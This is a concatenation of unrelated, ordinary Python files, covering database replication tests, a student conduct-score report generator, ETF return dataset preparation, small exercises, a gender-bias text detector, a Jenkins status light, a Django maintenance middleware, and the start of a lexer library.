        """Checks the binlog player variables are correctly exported.

        Args:
          tablet_obj: the tablet to check.
          source_shards: the shards to check we are replicating from.
          seconds_behind_master_max: if non-zero, the lag should be smaller than
            this value.
        """
        v = utils.get_vars(tablet_obj.port)
        self.assertIn('VReplicationStreamCount', v)
        # NOTE: assertEquals is the deprecated alias of assertEqual.
        self.assertEquals(v['VReplicationStreamCount'], len(source_shards))
        self.assertIn('VReplicationSecondsBehindMasterMax', v)
        self.assertIn('VReplicationSecondsBehindMaster', v)
        self.assertIn('VReplicationSource', v)
        shards = v['VReplicationSource'].values()
        self.assertEquals(sorted(shards), sorted(source_shards))
        self.assertIn('VReplicationSourceTablet', v)
        for uid in v['VReplicationSource']:
            self.assertIn(uid, v['VReplicationSourceTablet'])
        if seconds_behind_master_max != 0:
            self.assertTrue(
                v['VReplicationSecondsBehindMasterMax'] <
                seconds_behind_master_max,
                'VReplicationSecondsBehindMasterMax is too high: %d > %d' % (
                    v['VReplicationSecondsBehindMasterMax'],
                    seconds_behind_master_max))
            for uid in v['VReplicationSource']:
                self.assertTrue(
                    v['VReplicationSecondsBehindMaster'][uid] <
                    seconds_behind_master_max,
                    'VReplicationSecondsBehindMaster is too high: %d > %d' % (
                        v['VReplicationSecondsBehindMaster'][uid],
                        seconds_behind_master_max))

    def check_binlog_server_vars(self, tablet_obj, horizontal=True,
                                 min_statements=0, min_transactions=0):
        """Checks the binlog server variables are correctly exported.

        Args:
          tablet_obj: the tablet to check.
          horizontal: true if horizontal split, false for vertical split.
          min_statements: check the statement count is greater or equal to this.
          min_transactions: check the transaction count is greater or equal to this.
        """
        v = utils.get_vars(tablet_obj.port)
        if horizontal:
            skey = 'UpdateStreamKeyRangeStatements'
            tkey = 'UpdateStreamKeyRangeTransactions'
        else:
            skey = 'UpdateStreamTablesStatements'
            tkey = 'UpdateStreamTablesTransactions'
        self.assertIn(skey, v)
        self.assertIn(tkey, v)
        if min_statements > 0:
            self.assertTrue(v[skey] >= min_statements,
                            'only got %d < %d statements' % (v[skey], min_statements))
        if min_transactions > 0:
            self.assertTrue(v[tkey] >= min_transactions,
                            'only got %d < %d transactions' % (v[tkey],
                                                               min_transactions))

    def check_stream_health_equals_binlog_player_vars(self, tablet_obj, count):
        """Checks the variables exported by streaming health check match vars.

        Args:
          tablet_obj: the tablet to check.
          count: number of binlog players to expect.
        """
        blp_stats = utils.get_vars(tablet_obj.port)
        self.assertEqual(blp_stats['VReplicationStreamCount'], count)
        # Enforce health check because it's not running by default as
        # tablets may not be started with it, or may not run it in time.
        utils.run_vtctl(['RunHealthCheck', tablet_obj.tablet_alias])
        stream_health = utils.run_vtctl_json(['VtTabletStreamHealth',
                                              '-count', '1',
                                              tablet_obj.tablet_alias])
        logging.debug('Got health: %s', str(stream_health))
        self.assertNotIn('serving', stream_health)
        self.assertIn('realtime_stats', stream_health)
        self.assertNotIn('health_error', stream_health['realtime_stats'])
        self.assertIn('binlog_players_count', stream_health['realtime_stats'])
        self.assertEqual(blp_stats['VReplicationStreamCount'],
                         stream_health['realtime_stats']['binlog_players_count'])
        self.assertEqual(blp_stats['VReplicationSecondsBehindMasterMax'],
                         stream_health['realtime_stats'].get(
                             'seconds_behind_master_filtered_replication', 0))

    def check_destination_master(self, tablet_obj, source_shards):
        """Performs multiple checks on a destination master.

        Combines the following:
          - wait_for_binlog_player_count
          - check_binlog_player_vars
          - check_stream_health_equals_binlog_player_vars

        Args:
          tablet_obj: the tablet to check.
          source_shards: the shards to check we are replicating from.
        """
        tablet_obj.wait_for_binlog_player_count(len(source_shards))
        self.check_binlog_player_vars(tablet_obj, source_shards)
        self.check_stream_health_equals_binlog_player_vars(tablet_obj,
                                                           len(source_shards))

    def check_running_binlog_player(self, tablet_obj, query, transaction,
                                    extra_text=None):
        """Checks binlog player is running and showing in status.

        Args:
          tablet_obj: the tablet to check.
          query: number of expected queries.
          transaction: number of expected transactions.
          extra_text: if present, look for it in status too.
        """
        status = tablet_obj.get_status()
        self.assertIn('VReplication state: Open', status)
        # The status page renders the per-type counters as an HTML table cell.
        self.assertIn(
            '<td><b>All</b>: %d<br><b>Query</b>: %d<br>'
            '<b>Transaction</b>: %d<br></td>' % (query+transaction, query,
                                                 transaction), status)
        self.assertIn('</html>', status)
        if extra_text:
            self.assertIn(extra_text, status)

    def check_no_binlog_player(self, tablet_obj):
        """Checks no binlog player is running.

        Also checks the tablet is not showing any binlog player in its status page.

        Args:
          tablet_obj: the tablet to check.
        """
        tablet_obj.wait_for_binlog_player_count(0)

    def check_throttler_service(self, throttler_server, names, rate):
        """Checks that the throttler responds to RPC requests.

        We assume it was enabled by SplitClone with the flag --max_tps 9999.

        Args:
          throttler_server: vtworker or vttablet RPC endpoint. Format: host:port
          names: Names of the throttlers e.g. BinlogPlayer/0 or <keyspace>/<shard>.
          rate: Expected initial rate the throttler was started with.
        """
        self.check_throttler_service_maxrates(throttler_server, names, rate)
        self.check_throttler_service_configuration(throttler_server, names)

    def check_throttler_service_maxrates(self, throttler_server, names, rate):
        """Checks the vtctl ThrottlerMaxRates and ThrottlerSetRate commands."""
        # Avoid flakes by waiting for all throttlers. (Necessary because filtered
        # replication on vttablet will register the throttler asynchronously.)
        timeout_s = 10
        while True:
            stdout, _ = utils.run_vtctl(['ThrottlerMaxRates', '--server',
                                         throttler_server], auto_log=True,
                                        trap_output=True)
            if '%d active throttler(s)' % len(names) in stdout:
                break
            timeout_s = utils.wait_step('all throttlers registered', timeout_s)
        for name in names:
            self.assertIn('| %s | %d |' % (name, rate), stdout)
        self.assertIn('%d active throttler(s)' % len(names), stdout)
        # Check that it's possible to change the max rate on the throttler.
        new_rate = 'unlimited'
        stdout, _ = utils.run_vtctl(['ThrottlerSetMaxRate', '--server',
                                     throttler_server, new_rate],
                                    auto_log=True, trap_output=True)
        self.assertIn('%d active throttler(s)' % len(names), stdout)
        stdout, _ = utils.run_vtctl(['ThrottlerMaxRates', '--server',
                                     throttler_server], auto_log=True,
                                    trap_output=True)
        for name in names:
            self.assertIn('| %s | %s |' % (name, new_rate), stdout)
        self.assertIn('%d active throttler(s)' % len(names), stdout)

    def check_throttler_service_configuration(self, throttler_server, names):
        """Checks the vtctl (Get|Update|Reset)ThrottlerConfiguration commands."""
        # Verify updating the throttler configuration.
        stdout, _ = utils.run_vtctl(['UpdateThrottlerConfiguration',
                                     '--server', throttler_server,
                                     '--copy_zero_values',
                                     'target_replication_lag_sec:12345 '
                                     'max_replication_lag_sec:65789 '
                                     'initial_rate:3 '
                                     'max_increase:0.4 '
                                     'emergency_decrease:0.5 '
                                     'min_duration_between_increases_sec:6 '
                                     'max_duration_between_increases_sec:7 '
                                     'min_duration_between_decreases_sec:8 '
                                     'spread_backlog_across_sec:9 '
                                     'ignore_n_slowest_replicas:0 '
                                     'ignore_n_slowest_rdonlys:0 '
                                     'age_bad_rate_after_sec:12 '
                                     'bad_rate_increase:0.13 '
                                     'max_rate_approach_threshold: 0.9 '],
                                    auto_log=True, trap_output=True)
        self.assertIn('%d active throttler(s)' % len(names), stdout)
        # Check the updated configuration.
        stdout, _ = utils.run_vtctl(['GetThrottlerConfiguration',
                                     '--server', throttler_server],
                                    auto_log=True, trap_output=True)
        for name in names:
            # The max should be set and have a non-zero value.
            # We test only the first field 'target_replication_lag_sec'.
            self.assertIn('| %s | target_replication_lag_sec:12345 ' % (name), stdout)
        # protobuf omits fields with a zero value in the text output.
        self.assertNotIn('ignore_n_slowest_replicas', stdout)
        self.assertIn('%d active throttler(s)' % len(names), stdout)
        # Reset clears our configuration values.
        stdout, _ = utils.run_vtctl(['ResetThrottlerConfiguration',
                                     '--server', throttler_server],
                                    auto_log=True, trap_output=True)
        self.assertIn('%d active throttler(s)' % len(names), stdout)
        # Check that the reset configuration no longer has our values.
        stdout, _ = utils.run_vtctl(['GetThrottlerConfiguration',
                                     '--server', throttler_server],
                                    auto_log=True, trap_output=True)
        # Target lag value should no longer be 12345 and be back to the default.
        self.assertNotIn('target_replication_lag_sec:12345', stdout)
        self.assertIn('%d active throttler(s)' % len(names), stdout)

    def verify_reconciliation_counters(self, worker_port, online_or_offline,
                                       table, inserts, updates, deletes, equal):
        """Checks that the reconciliation Counters have the expected values."""
        worker_vars = utils.get_vars(worker_port)
        i = worker_vars['Worker' + online_or_offline + 'InsertsCounters']
        if inserts == 0:
            self.assertNotIn(table, i)
        else:
            self.assertEqual(i[table], inserts)
        u = worker_vars['Worker' + online_or_offline + 'UpdatesCounters']
        if updates == 0:
            self.assertNotIn(table, u)
        else:
            self.assertEqual(u[table], updates)
        d = worker_vars['Worker' + online_or_offline + 'DeletesCounters']
        if deletes == 0:
            self.assertNotIn(table, d)
        else:
            self.assertEqual(d[table], deletes)
        e = worker_vars['Worker' + online_or_offline + 'EqualRowsCounters']
        if equal == 0:
            self.assertNotIn(table, e)
        else:
            self.assertEqual(e[table], equal)
|
import argparse as arg
import pandas as pd
import numpy as np
import xlwings as xw
import os
import shutil
import time
# Disabled CLI parsing kept from an earlier version of the script.
#parser = arg.ArgumentParser()
#parser.add_argument("-g", default="total", help="machine group")
#args = parser.parse_args()

# Reporting period and input/output file names.
smonth = "2017.09"
stable = "行为规范表"
sfolder = smonth + "月" + stable
fnamelist = "list.name.csv"
frulelist = "list.rule.csv"
frecord = smonth + ".record.csv"
fnamesave = smonth + ".summary.name.csv"
frulesave = smonth + ".summary.rule.csv"

# Load the name roster (indexed by student No) and abort on duplicate ids.
aname = pd.read_csv(fnamelist, header=None, usecols=[0, 1, 2], index_col=0, names=['No', 'name', 'A'])
t = aname.index.duplicated()
aname['duplicated'] = t
print('\n--- Name List ---')
print(aname)
t = aname[aname['duplicated'] == True]
if not t.empty:
    print('--- Error ---')
    print(t)
    exit(0)

# Load the rule list (indexed by rule text) and abort on duplicate rules.
arule = pd.read_csv(frulelist, header=None, usecols=[0, 1, 2, 3], index_col=2, names=['group1', 'group2', 'rule', 'score'])
arule.group2.fillna(value='-', inplace=True)
arule['group3'] = arule.group1 + arule.group2
arule['total'] = 0
arule['Nos'] = 'a.'  # accumulator string of student Nos per rule
t = arule.index.duplicated()
arule['duplicated'] = t
print('\n--- Rule List ---')
print(arule)
t = arule[arule['duplicated'] == True]
if not t.empty:
    print('--- Error ---')
    print(t)
    exit(0)

# Load raw records; each record's No column packs several ids as 'x.1.2.3'.
arecord = pd.read_csv(frecord, header=None, usecols=[0, 1, 2], names=['date', 'rule', 'No'])
print('\n--- Record List ---')
print(arecord)
t1 = arecord.values
t2 = []
#print(type(t1))
for i in t1:
    # Split the packed No field; the first piece is a prefix, not an id.
    t3 = i[2].split('.')
    #print(type(t3))
    #print(t3)
    t3 = t3[1:]
    #print(t3)
    for j in t3:
        t2.append([j, i[1], i[0], 0])
#print(t2)
t4 = np.array(t2)
#print(t4.dtype)
brecord = pd.DataFrame(t4, columns=['No', 'rule', 'date', '0'])
print('\n--- Record Detail List ---')
print(brecord)

# Validate the detail records: unknown student Nos, unknown rules, and
# duplicate (No, rule, date) triples all abort the run.
flag = False
t1 = brecord.groupby(['No']).count()
#print(t1.index)
t2 = t1.index.values.astype(int)
t3 = aname.index.values
t4 = list(set(t2) - (set(t3)))
if t4:
    flag = True
    print('--- Error ---')
    print('--- invalid No ---')
    print(t4)
    for i in t4:
        print(brecord[brecord['No'].astype(int) == i])
t1 = brecord.groupby(['rule']).count()
t2 = t1.index.values
t3 = arule.index.values
t4 = list(set(t2) - (set(t3)))
if t4:
    flag = True
    print('--- Error ---')
    print('--- invalid rule ---')
    print(t4)
    for i in t4:
        print(brecord[brecord['rule'] == i])
t1 = brecord.groupby(['No', 'rule', 'date']).count()
t2 = t1[t1['0'] > 1]
if not t2.empty:
    flag = True
    print('--- Error ---')
    print('--- repeat record ---')
    print(t2)
if flag:
    exit(0)

# Add per-group score columns (start at 0) and per-subgroup detail string
# columns to the roster; everyone starts from a total of 100.
t1 = arule.groupby(['group1']).count()
t2 = t1.index.values
for i in t2:
    aname[i] = 0
aname['total'] = 100
aname['comment'] = '差'
t1 = arule.groupby(['group3']).count()
t2 = t1.index.values
for i in t2:
    aname[i] = ''
#print(aname)

# Tally each student's records into group scores, the running total, the
# per-rule detail string, and per-rule usage counters.
for iNo in aname.index:
    t1 = brecord[brecord.No.astype(int) == iNo]
    tx = t1.groupby('rule').count().index.values
    for iRule in tx:
        t2 = t1[t1.rule == iRule]
        t3 = t2.date.values
        t4 = arule[arule.index == iRule]
        tgroup1 = t4['group1'].values[0]
        tgroup3 = t4['group3'].values[0]
        tscore = t4['score'].values[0]
        t5 = aname[aname.index == iNo]
        tnoA = t5['A'].values[0]
        #print(tgroup1, tgroup3, tscore, tnoA, iNo, iRule)
        # Negative scores are doubled for students flagged 'A'.
        i = 1
        if (tscore < 0 and tnoA == 'A'):
            i = 2
        i1 = 0
        s1 = ''
        for i2 in t3:
            i1 = i1 + tscore * i
            s1 = s1 + i2 + ' '
        #print(i1, s1)
        aname.loc[iNo, tgroup1] = aname.loc[iNo, tgroup1] + i1
        aname.loc[iNo, 'total'] = aname.loc[iNo, 'total'] + i1
        aname.loc[iNo, tgroup3] = aname.loc[iNo, tgroup3] + iRule + '(' + s1 + ') '
        arule.loc[iRule, 'total'] = arule.loc[iRule, 'total'] + 1
        ss = str(iNo)
        arule.loc[iRule, 'Nos'] = arule.loc[iRule, 'Nos'] + ss + '.'

# Map total scores to letter comments and write both summary CSVs.
t1 = aname['total'].values
t2 = []
for i1 in t1:
    if i1 >= 90:
        i2 = 'A(优)'
    elif i1 >= 85:
        i2 = 'B(良)'
    elif i1 >= 80:
        i2 = 'C(中)'
    else:
        i2 = 'D(差)'
    t2.append(i2)
aname['comment'] = t2
print(aname)
print(arule)
aname.to_csv(fnamesave)
arule.to_csv(frulesave)

# Rebuild the per-student Excel reports from the template workbook.
shutil.rmtree(sfolder, ignore_errors=True)
os.mkdir(sfolder)
for iNo in aname.index:
    s1 = '{:02d}'.format(iNo)
    t1 = sfolder + "(" + s1 + ").xlsx"
    t2 = sfolder + r"/" + t1
    t3 = r"规范表模板/小白.xlsx"
    shutil.copyfile(t3, t2)
    wb = xw.Book(t2)
    app = xw.apps.active
    sheet1 = wb.sheets['Sheet1']
    sheet1.range('B5').value = sfolder
    sheet1.range('B6').value = 'No.' + s1
    sheet1.range('D7').value = aname.loc[iNo, 'name']
    sheet1.range('F7').value = aname.loc[iNo, 'total']
    sheet1.range('H7').value = aname.loc[iNo, 'comment']
    # One detail row per rule subgroup, starting at D8.
    tx = arule.groupby('group3').count().index.values
    i = 8
    for j in tx:
        k = 'D' + str(i)
        sheet1.range(k).value = aname.loc[iNo, j]
        i = i + 1
    wb.save()
    #wb.close()
    xw.App.quit(app)
    #time.sleep(1)
    # Busy-wait until the Excel app instance has actually quit before
    # copying the template for the next student.
    i = 0
    while (True):
        i = i + 1
        appx = xw.apps
        k = True
        for j in appx:
            if (j == app):
                k = False
        if (k):
            s2 = '{:9d}'.format(i)
            print("--- ", s1, " ---", s2, app, " ", xw.apps.count, xw.apps)
            break
|
import os
import pickle
import numpy as np
import pandas as pd
from functools import reduce
import config as cfg
import utils
import argparse
# Command-line interface: required paths to the three raw ETF CSV files.
parser = argparse.ArgumentParser()
parser.add_argument("-spy", type=str, help="Path to the raw SPY data file", required=True)
parser.add_argument("-dia", type=str, help="Path to the raw DIA data file", required=True)
parser.add_argument("-qqq", type=str, help="Path to the raw QQQ data file", required=True)
args = parser.parse_args()
def load_and_merge(spy_path, dia_path, qqq_path):
    """Load the three ETF CSVs and inner-merge them on Date.

    Each frame keeps only the Date and 'Adj Close' columns; the
    'Adj Close' columns are suffixed with the ETF ticker
    (_dia, _qqq, _spy in merge order).

    Returns:
        A single merged DataFrame with one row per common Date.
    """
    # Bug fix: the original ignored its path parameters and read from the
    # module-level `args` instead, making the function untestable and its
    # signature a lie.
    price_cols = ['Open', 'High', 'Low', 'Close', 'Volume']
    spy_df = pd.read_csv(spy_path).drop(columns=price_cols)
    dia_df = pd.read_csv(dia_path).drop(columns=price_cols)
    qqq_df = pd.read_csv(qqq_path).drop(columns=price_cols)
    spy_df.columns = spy_df.columns.map(lambda x: x + '_spy' if x != 'Date' else x)
    dia_df.columns = dia_df.columns.map(lambda x: x + '_dia' if x != 'Date' else x)
    qqq_df.columns = qqq_df.columns.map(lambda x: x + '_qqq' if x != 'Date' else x)
    dfs = [dia_df, qqq_df, spy_df]
    return reduce(lambda left, right: pd.merge(left, right, on='Date'), dfs)
def load(spy_path, dia_path, qqq_path):
    """Load each ETF CSV, keeping only the Date and 'Adj Close' columns.

    Returns:
        Three DataFrames: (spy_df, dia_df, qqq_df).
    """
    # Bug fix: the original ignored its path parameters and read from the
    # module-level `args` instead.
    price_cols = ['Open', 'High', 'Low', 'Close', 'Volume']
    spy_df = pd.read_csv(spy_path).drop(columns=price_cols)
    dia_df = pd.read_csv(dia_path).drop(columns=price_cols)
    qqq_df = pd.read_csv(qqq_path).drop(columns=price_cols)
    return spy_df, dia_df, qqq_df
def compute_return(df):
    """Append a 'Return' column: the one-period log return of 'Adj Close'.

    Mutates and returns the same DataFrame; the first row's return is NaN.
    """
    log_price = np.log(df['Adj Close'])
    df['Return'] = log_price - log_price.shift(periods=1)
    return df
def train_val_test_split(df):
    """Index df by its Date column (in place) and slice it into the
    total / training / validation / out-of-sample windows defined by the
    date boundaries in config.

    Returns:
        (Total_df, Training_df, Test_df, Out_of_sample_df)
    """
    df['Date'] = pd.to_datetime(df['Date'])
    df.set_index('Date', inplace=True)

    def window(start, stop):
        # Inclusive date-range slice over the Date index.
        return df.loc[(start <= df.index) & (df.index <= stop)]

    total_df = window(cfg.TRAIN_START_DATE, cfg.TEST_STOP_DATE)
    training_df = window(cfg.TRAIN_START_DATE, cfg.TRAIN_STOP_DATE)
    validation_df = window(cfg.VAL_START_DATE, cfg.VAL_STOP_DATE)
    out_of_sample_df = window(cfg.TEST_START_DATE, cfg.TEST_STOP_DATE)
    return total_df, training_df, validation_df, out_of_sample_df
def format_datasets(spydf, diadf, qqqdf):
    """Build lagged-return feature sets per model family and persist the splits.

    For each model type (MLP / RNN / PSN) the lag lists configured in ``cfg``
    are used to add shifted 'Return_<lag>' columns, the unshifted Return
    becomes the 'Target', and the train / validation / out-of-sample splits
    are pickled under data/<TICKER>/<MODEL>/.
    """
    for n in ["MLP", "RNN", "PSN"]:
        # Work on copies so every model family starts from the raw frames.
        tmp_spydf = spydf.copy()
        tmp_diadf = diadf.copy()
        tmp_qqqdf = qqqdf.copy()
        # Lagged return features; lag lists are model- and ticker-specific.
        for i in cfg.SPYfeatures[n]:
            tmp_spydf['Return_'+str(i)] = tmp_spydf.Return.shift(i)
        for i in cfg.DIAfeatures[n]:
            tmp_diadf['Return_'+str(i)] = tmp_diadf.Return.shift(i)
        for i in cfg.QQQfeatures[n]:
            tmp_qqqdf['Return_'+str(i)] = tmp_qqqdf.Return.shift(i)
        # The prediction target is the current (unshifted) return.
        tmp_spydf['Target'] = tmp_spydf.Return
        tmp_diadf['Target'] = tmp_diadf.Return
        tmp_qqqdf['Target'] = tmp_qqqdf.Return
        SPY_Total_df, SPY_Training_df, SPY_Test_df, SPY_Out_of_sample_df = train_val_test_split(tmp_spydf)
        DIA_Total_df, DIA_Training_df, DIA_Test_df, DIA_Out_of_sample_df = train_val_test_split(tmp_diadf)
        QQQ_Total_df, QQQ_Training_df, QQQ_Test_df, QQQ_Out_of_sample_df = train_val_test_split(tmp_qqqdf)
        os.makedirs(os.path.join("data", "SPY", n), exist_ok=True)
        os.makedirs(os.path.join("data", "DIA", n), exist_ok=True)
        os.makedirs(os.path.join("data", "QQQ", n), exist_ok=True)
        # Naming note: the "Test" split from train_val_test_split is saved as
        # the validation set; the out-of-sample window becomes Test.pkl.
        utils.save_file(SPY_Training_df, os.path.join("data", "SPY", n, "Train.pkl"))
        utils.save_file(SPY_Test_df, os.path.join("data", "SPY", n, "Valid.pkl"))
        utils.save_file(SPY_Out_of_sample_df, os.path.join("data", "SPY", n, "Test.pkl"))
        utils.save_file(DIA_Training_df, os.path.join("data", "DIA", n, "Train.pkl"))
        utils.save_file(DIA_Test_df, os.path.join("data", "DIA", n, "Valid.pkl"))
        utils.save_file(DIA_Out_of_sample_df, os.path.join("data", "DIA", n, "Test.pkl"))
        utils.save_file(QQQ_Training_df, os.path.join("data", "QQQ", n, "Train.pkl"))
        utils.save_file(QQQ_Test_df, os.path.join("data", "QQQ", n, "Valid.pkl"))
        utils.save_file(QQQ_Out_of_sample_df, os.path.join("data", "QQQ", n, "Test.pkl"))
if __name__ == "__main__":
    # Load the three raw files, derive log returns, then write the
    # per-model datasets to disk.
    spydf, diadf, qqqdf = load(args.spy, args.dia, args.qqq)
    spydf = compute_return(spydf)
    diadf = compute_return(diadf)
    qqqdf = compute_return(qqqdf)
    # Create and Save Datasets
    format_datasets(spydf, diadf, qqqdf)
# Package version as a tuple (rendered elsewhere as e.g. "1.3.1").
VERSION = (1, 3, 1)

# Re-export the public API at package level.
from .decorators import job
from .queues import enqueue, get_connection, get_queue, get_scheduler
from .workers import get_worker
|
# -*- coding: utf-8 -*-
from functools import reduce
def str2float(s):
    """Convert a decimal string such as '123.456' to a float using reduce,
    without calling float().

    Generalized over the original: also accepts strings without a decimal
    point ('42') and with an empty integer or fractional part ('.5', '7.').
    The original crashed on those (ValueError from str.index / TypeError
    from reduce on an empty sequence).
    """
    def fn(x, y):
        # Fold the next decimal digit onto the accumulated value.
        return x * 10 + y

    dot = s.find('.')  # -1 when there is no decimal point
    if dot < 0:
        int_part, frac_part = s, ''
    else:
        int_part, frac_part = s[:dot], s[dot + 1:]
    # The initializer 0 makes reduce safe on empty digit sequences.
    integer = reduce(fn, map(int, int_part), 0)
    fraction = reduce(fn, map(int, frac_part), 0)
    return integer + fraction * 0.1 ** len(frac_part)
print('str2float(\'123.456\') =', str2float('123.456'))
|
"""
Check for statements that pertain to personal, rather than profession, life.
Letters for women are more likely to discuss personal life.
Goal: Develop code that can read text for terms related to personal life like
family, children, etc. If the text includes personal life details; return a
summary that directs the author to review the personal life details for
relevance and consider removing them if they are not relevant to the
recommendation or evaluation.
"""
from genderbias.document import Document
from genderbias.detector import Detector, Flag, Issue, Report
# Lowercased terms whose presence suggests the text discusses personal
# (rather than professional) life; compared against lowercased tokens.
PERSONAL_LIFE_TERMS = [
    "child",
    "children",
    "family",
    "girlfriend",
    "maternal",
    "mother",
    "motherly",
    "spouse",
    "wife",
]
class PersonalLifeDetector(Detector):
    """
    This detector checks for words that relate to personal life instead of
    professional life.

    Links:
        https://github.com/molliem/gender-bias/issues/9
        http://journals.sagepub.com/doi/pdf/10.1177/0957926503014002277
    """

    def get_report(self, doc):
        """
        Generate a report on the text based upon mentions of
        personal-life-related words.

        Arguments:
            doc (Document): The document to check

        Returns:
            Report
        """
        report = Report("Personal Life")
        for token, begin, end in doc.words_with_indices():
            # Only lowercased exact matches against the term list are flagged.
            if token.lower() not in PERSONAL_LIFE_TERMS:
                continue
            issue = Issue(
                "Personal Life",
                "The word {word} tends to relate to personal life.".format(word=token),
                "Try replacing with a sentiment about professional life."
            )
            report.add_flag(Flag(begin, end, issue))
        return report
def personal_life_terms_prevalence(doc: 'Document') -> float:
    """
    Return the prevalence of terms that refer to personal life.

    Arguments:
        doc (Document): The document to check

    Returns:
        float: the ratio ``personal / total`` over the document's words;
        0.0 for an empty document (the original raised ZeroDivisionError).
    """
    doc_words = doc.words()
    if not doc_words:
        # Guard: an empty document trivially has no personal-life content.
        return 0.0
    hits = sum(1 for word in doc_words if word in PERSONAL_LIFE_TERMS)
    return hits / len(doc_words)
|
#! python3
"""
Have the user enter a username and password.
Repeat this until both the username and password match the
following:
username: admin
password: 12345
(2 marks)
inputs:
str (username)
str (password)
outputs:
Access granted
Access denied
"""
# Prompt until both credentials match. Whitespace is stripped on EVERY
# attempt — the original only stripped the first prompt, so a retry with
# a trailing space was rejected even when otherwise correct.
username = input("Enter a username ").strip()
password = input("Enter a password ").strip()
while (username != "admin") or (password != "12345"):
    print("Access denied")
    username = input("Enter a username ").strip()
    password = input("Enter a password ").strip()
# The loop only exits once both values match, so the original trailing
# `if` re-check was always true and has been removed.
print("Access granted")
|
# Python 2.7
import logging
import json
import socket
import subprocess
import os
from httplib import HTTPConnection
# MP710 relay command strings per light color: each PORTxx=<value>:NC triple
# sets one output channel (128 = on, 0 = off).
STATE = dict(Yellow="PORT11=0:NC PORT12=128:NC PORT13=0:NC",
             Red="PORT11=0:NC PORT12=0:NC PORT13=128:NC",
             Green="PORT11=128:NC PORT12=0:NC PORT13=0:NC",
             Off="PORT11=0:NC PORT12=0:NC PORT13=0:NC",
             All="PORT11=128:NC PORT12=128:NC PORT13=128:NC")
def set_command(color):
    """Invoke MP710.exe (expected in the working directory) to switch the
    light to *color*, one of the STATE keys."""
    control_path = os.path.join(os.getcwd(), 'MP710.exe')
    command = ' '.join([control_path, 'CMD=100', 'PRG=15', STATE[color]])
    runner = subprocess.Popen(command, shell=True)
    runner.wait()
if __name__ == "__main__":
    logging.basicConfig(filename='log_file.log', level=logging.DEBUG, filemode='w')
    # Yellow = status unknown while we query Jenkins.
    set_command('Yellow')
    logging.debug("Start to validate...")
    try:
        connection = HTTPConnection('jenkins')
        connection.request("GET", "/api/main_build_status/")
        response = connection.getresponse()
        data = response.read()
        result = json.loads(data)
        BUILD_RESULT = result.get('build_status')
        TESTS_RESULT = result.get('functional_tests')
        ENV_RESULT = result.get('main_env_status')
        logging.debug("BUILD: %s" % BUILD_RESULT)
        logging.debug("TEST: %s" % TESTS_RESULT)
        logging.debug("ENV: %s" % ENV_RESULT)
        # Red on any hard failure; Green only when build AND tests pass;
        # the light stays Yellow while the build is in progress.
        if BUILD_RESULT == "FAILED":
            set_command("Red")
            logging.debug("Build is FAILED")
        elif ENV_RESULT == "FAILED":
            set_command("Red")
            logging.debug("Env is FAILED")
        elif BUILD_RESULT == "STARTED":
            logging.debug("Build in progress")
        elif BUILD_RESULT == "SUCCESS":
            logging.debug("Build is OK.")
            if TESTS_RESULT == "SUCCESS":
                set_command("Green")
                logging.debug("Functional Tests are OK.")
            else:
                set_command("Red")
                logging.debug("Functional Tests are FAILED")
    except socket.error:
        # No connectivity to the Jenkins host: signal with red as well.
        set_command("Red")
        logging.debug("Some problem with internet!")
|
from django.http import HttpResponse
class AppMaintainanceMiddleware(object):
    """Django middleware that short-circuits every request with a static
    maintenance notice. The wrapped handler is stored but intentionally
    never invoked while this middleware is installed."""

    def __init__(self, get_response):
        # Standard Django middleware signature; kept for when maintenance
        # mode is lifted and the middleware is removed from settings.
        self.get_response = get_response

    def __call__(self, request):
        return HttpResponse('<h1> currently application is under maintainance! <p style="color:red;">please try again later.!</p> thank you :)</h1>')
|
# Demo: a string literal, echoed together with its character count.
test_str = "Hey, I'm a string, and I have a lot of characters...cool!"
print(test_str)
print("String length:", len(test_str))
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
`nr.strex` String Processing Library
====================================
Strex is a simple library to tokenize and parse small or even
complex languages. It has been developed specifically for the
recursive decent parser technique, although it might work well
with other parsing techniques as well.
'''
import collections
import string
import re
import sys
__author__ = 'Niklas Rosenstein <rosensteinniklas(at)gmail.com>'
__version__ = '1.4.1'

# Sentinel token type used to signal the end of input.
eof = 'eof'

# Accepted text types: Python 3 has only `str`; Python 2 also has `unicode`.
string_types = (str,) if sys.version_info[0] == 3 else (str, unicode)

# Cursor: an immutable position in the text (index plus line/column numbers).
Cursor = collections.namedtuple('Cursor', 'index lineno colno')
# Token: a tagged value produced by the lexer; `cursor` is where it started.
Token = collections.namedtuple('Token', 'type cursor value')
class Scanner(object):
  ''' This class is used to step through text character by character
  and keep track of the line and column numbers of each passed
  character. The Scanner will only tread line-feed as a newline.

  @param text
    The text to parse. Must be a `str` in Python 3 and may also be
    a `unicode` object in Python 2.
  @attr text
  @attr index The index in the text.
  @attr lineno The current line number.
  @attr colno The current column number.
  @property cursor The current `Cursor` value.
  @property char The current character, or an empty string/unicode
    if the end of the text was reached. '''

  def __init__(self, text):
    if not isinstance(text, string_types):
      raise TypeError('expected str or unicode', type(text))
    super(Scanner, self).__init__()
    self.text = text
    self.index = 0
    self.lineno = 1
    self.colno = 0

  def __repr__(self):
    # Bugfix: the original used '{0}:{0}', printing the line number twice
    # and silently dropping the column number.
    return '<Scanner at {0}:{1}>'.format(self.lineno, self.colno)

  def __bool__(self):
    # True while at least one unread character remains.
    return self.index < len(self.text)

  __nonzero__ = __bool__  # Python 2

  @property
  def cursor(self):
    return Cursor(self.index, self.lineno, self.colno)

  @property
  def char(self):
    if self.index >= 0 and self.index < len(self.text):
      return self.text[self.index]
    else:
      # Same type as the scanned text (str/unicode), but empty.
